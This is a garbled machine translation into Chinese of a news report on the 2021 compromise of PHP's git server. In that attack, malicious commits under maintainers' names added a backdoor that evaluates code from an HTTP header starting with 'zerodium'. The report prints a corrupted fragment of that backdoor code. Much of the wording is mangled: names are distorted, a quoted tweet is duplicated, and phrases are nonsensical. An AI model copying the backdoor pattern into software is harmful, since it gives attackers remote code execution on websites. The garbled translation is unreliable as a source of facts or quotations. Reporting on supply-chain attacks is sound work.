破坏内部GIT服务器后的黑客后门PHP源代码

2021-03-30 03:33:37

一个黑客损失了用于分发PHP编程语言的服务器,并添加了一个后门到源代码,该源代码将使网站易受完成收购,开源项目的成员表示。

在周末推动到PHP Git服务器的两个更新增加了一条线,如果由PHP供电的网站运行,则允许访问者没有授权来执行其选择代码。这里的恶意提交,这里给了在HTTP标头中有“Zerodium”这个词的代码注射功能。

在两个众所周知的PHP开发人员,Rasmus Lerdorf和Nikita Popov的账户名称下,向PHP-SRC押回进行。 “我们不知道这是究竟发生了究竟发生了什么,但一切都指向Git.php.net服务器的妥协(而不是个人git帐户的妥协),”波普夫在星期天晚上发表的通知中写道。

在妥协的后果中,波波夫说,PHP维护人员得出结论,他们独立的GIT基础设施是不必要的安全风险。因此,它们将停止Git.php.net服务器并使Github是PHP存储库的官方来源。展望未来,所有PHP源代码更改将直接转到GitHub而不是Git.php.net。

恶意变化在包括Markus Staab,Jake Birchallf和MichaelVožíše的开发人员之后不迟于周日晚上,因为他们在周六审查了提交的提交。声称修复拼写错误的更新是在使用Lerdorf名称的帐户下进行的。第一次发现后不久,voğíšek发现了第二次恶意提交,这是在波普洛夫的账户名称下制造的。它声称要恢复以前的错字修复。

onvert_to_string(enc); if(strstr(z_strval_p(enc)," zerodium")){ zend_try { zend_eval_string(z_strval_p(enc)+8,null," removethis:卖给零二,2017年中期");

Zerodium是一位经纪人,可以从研究人员那里爆炸,并将他们销售给政府机构以用于调查或其他目的。为什么提交引用的zerodium不清楚。本公司首席执行官Chaouki Bekrar于周一表示,在Twitter上表示,它没有涉及。

他写道,“在今天的PHP GIT妥协的犯罪中欢呼奖金的巨魔。” “显然,我们与此无关。可能是研究人员,谁发现这个错误/利用试图将其卖给许多实体,但没有想买这个废话,所以他们烧掉了乐趣。

欢呼" Zerodium&#34的巨魔。今天' s php git会受到影响的提交。显然,我们与此无关。可能是发现这个错误/利用的研究人员试图向许多实体出售,但没有想买这个废话,所以他们烧掉它的乐趣♥

- Chaouki Bekrar(@cbekrar)3月29日,2021年3月291日

在妥协之前,PHP组在自己的Git Server http://git.php.net/上处理了对存储库的所有写访问权限http://git.php.net/使用popov称为karma的“家庭成长”系统。它根据以前的贡献提供了开发人员不同级别的访问权限。与此同时,GitHub是镜像存储库。

现在,PHP组正在放弃自托管和管理的Git基础架构,并用GitHub替换它。更改意味着GitHub现在是“规范”存储库。 PHP组将不再使用业力系统。相反,贡献者必须是GitHub上的PHP组织的一部分,必须为账户使用双因素身份验证,以便具有提交的能力。

本周末的事件不是第一次通过执行供应链攻击的意图突破PHP.NET服务器。在2019年初,广泛使用的PHP扩展和应用储存库在发现黑客以恶意之后替换为主包管理器后暂时关闭了大部分网站。集团开发人员表示,在过去六个月里下载了包裹经理的任何人都应该获得一个新的副本。 PHP估计80%的网站。没有报告将恶意变化的网站纳入其生产环境。

网络发现平台隆隆声,网络发现平台隆隆声明的HD Moore表示,他们希望吹嘘他们未经授权访问PHP GIT服务器的人而不是试图实际支持使用PHP的网站的人员的变化。

“听起来像攻击者的声音是拖着零毒性,或者试图给人的印象是,代码被回归得多,”他告诉ars。 “无论如何,如果我对PHP的任何安全兴趣,我将花费大量的时间经历了很多时间。”